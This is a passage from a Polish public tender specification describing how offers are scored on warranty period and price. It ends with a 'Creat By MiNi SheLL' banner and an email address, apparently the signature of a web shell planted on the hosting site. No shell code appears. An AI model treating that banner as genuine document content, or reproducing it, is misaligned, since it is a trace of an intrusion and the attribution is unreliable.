miesięcy. Zaoferowany przez <br/>Wykonawcę okres gwarancji nie może być krótszy niż 24 miesięcy, natomiast gwarancja dłuższa niż 48 <br/>miesięcy nie będzie dodatkowo punktowana. <br/>W zakresie Kryterium „Okres gwarancji” maksymalną ilość punktów otrzyma oferta z najdłuższym <br/>okresem gwarancji, pozostałym Wykonawcom przyznana zostanie odpowiednio mniejsza liczba <br/>punktów, określona na podstawie następującego wzoru: <br/>Okres gwarancji oferty badanej <br/>Okres gwarancji = ------------------------------------------------- x100 pkt x 40 % <br/>Okres gwarancji oferty <br/>z najdłuższym okresem gwarancji <br/>c) W przypadku podania okresu gwarancji w innej formie niż wymagana lub pominięcie tego punktu w <br/>Formularzu oferty– Zamawiający przyjmie, że Wykonawca proponuje najniższy okres gwarancji, czyli 12 <br/>miesięcy. <br/>d) W ramach kryterium „Okres gwarancji” można otrzymać maksymalnie 40 pkt. <br/>4. Oceną oferty będzie suma punktów przyznanych według opisanych powyżej kryteriów wg wzoru: <br/>S= C+G gdzie: <br/>S – suma punktów przyznanych ofercie <br/>C- liczba punktów przyznanych ofercie w Kryterium Cena <br/>G – liczba punktów przyznanych ofercie w Kryterium Okres gwarancji <br/>5. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z <br/>dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki. <br/>6. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści <br/>złożonej oferty, w tym zaoferowanej ceny. <br/>7. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą – <br/>oferta z najwyższą liczbą punktów.

Creat By MiNi SheLL
Email: jattceo@gmail.com